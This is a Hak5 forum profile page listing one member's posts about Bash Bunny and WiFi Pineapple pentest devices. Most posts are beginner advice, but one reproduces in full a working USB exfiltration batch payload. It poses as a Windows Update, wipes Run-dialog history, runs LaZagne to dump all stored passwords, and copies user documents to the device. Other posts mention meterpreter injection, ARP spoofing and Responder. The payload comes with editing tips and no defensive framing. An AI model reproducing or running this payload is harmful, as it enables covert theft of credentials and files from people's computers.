Jump to content
Hak5 Forums

m40295

Active Members
  • Content count

    286
  • Joined

  • Last visited

  • Days Won

    3

About m40295

  • Rank
    Hak5 Pirate

Recent Profile Visitors

2,590 profile views
  1. m40295

    [RELEASE] WiFi Pineapple Firmware v2.3.0

    Thanks seb will check it out
  2. m40295

    assistance

    I can reccomend the hak5 books on the pineapple. Also there are some amazing hak5 videos I can recommend a online ethical pentesting course aswell
  3. m40295

    Bash Bunny Beginner Help

    You can offer me a million and I still wouldn't take. What if I offer you some links to do research so you can teach yourself
  4. m40295

    Bash Bunny Beginner Help

    Sorry no Maybe someone else can help you but it's a fairly basic payload drag drop modify one or two lines
  5. m40295

    Bash Bunny Beginner Help

    It's a lot easier if you learn the steps yourself , there are many places full of resources YouTube search bash bunny introduction github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/usb_exfiltrator Edit e.cmd @echo off @echo Installing Windows Update REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious REM This executes LaZagne in the current directory and outputs the password file to Loot REM Time and Date is also added setlocal cd /d %~dp0 %~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt" REM These lines if you just want Passwords and no files. set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% mkdir %dst% >>nul if Exist %USERPROFILE%\Documents ( REM /C Continues copying even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted files to destination that does not support encryption. REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. REM /E Copies directories and subdirectories, including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul REM Same as above but does not create empty directories REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul ) REM Blink CAPSLOCK key start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" @cls @exit The e. C MD file can be edited near the bottom to copy what you want edit the X copy and just put your file extension
  6. And I haven't had a issue. Autostart runs on the modules I use. The only fix I had to do was manualy set firewall rules to allow 22 on both interfaces
  7. I think I understand the question yes it's possible too inject meterpreter shell The Bash bunny would do the injecting but your options would have to be set to you're attacking computer not the bash bunny
  8. m40295

    Quick Question

    Always safely eject bash bunny before removing or you will recive that error
  9. m40295

    Maybe a nice tool for pentesters...

    So I ordered 4 all together I live in a town that 7 km long by 4 km wide I figure one plugged in at home one day and one uptown at various friends house and all I have full coverage, plus they're going to have antenna ports for WiFi and radio and I happen to be a collector of many antennas see what we can do with it my first house will be running everything through my openvpn server
  10. m40295

    Unable to install tools

    I reset my bb and ran updater app. Then in arming mode I copyed my 3 .deb files to tools. Reboot waited rebooted and tada Tools installed. I beleve there installed in /usr/share/
  11. m40295

    Undercover bunny payload purpose

    https://en.m.wikipedia.org/wiki/ARP_spoofing My recommendation is for you to start searching and learning. Then build yourself a lab. vmware install a windows os and a kali os. Create a virtural network and try some things out. Remeber the command. Man. example. Man arp. Will show you the manual of arp. being in remote access. Is exactly what it does
  12. m40295

    Unable to install tools

    your putting https://storage.googleapis.com/bashbunny_tools/responder-bunny.deb. into tools folder ? Rebooting ? Try ssh into bunny type responder
  13. m40295

    Undercover bunny payload purpose

    Once the attacker is connected remotely thru wifi he can perform attacks. Arp spoofing. Nmap scanning for open ports providing remote access thru wifi
  14. m40295

    New language

    Checkout other posts
×